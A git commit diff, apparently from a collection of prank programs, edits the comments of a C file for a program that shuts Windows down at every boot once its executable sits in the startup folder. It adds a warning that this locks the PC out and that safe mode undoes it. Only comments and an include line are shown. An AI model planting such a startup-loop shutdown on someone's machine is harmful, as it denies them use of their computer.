Simply shuts the system down.

This commit is contained in:
Minhas Kamal
2024-04-07 14:07:57 -05:00
committed by GitHub
parent c917cc06db
commit 131c35eec5

View File

@@ -1,5 +1,10 @@
// Simply shuts the system down.
// Put it in the startup directory (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
// Put the compiled executable in the startup directory
// (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
// of WindowsOS. And be the Devil!
// Caution: This will prevent you from turning the PC on. To
// solve, you can turn on the PC in safe mode and remove the
// executable from the startup directory.
#include <stdlib.h>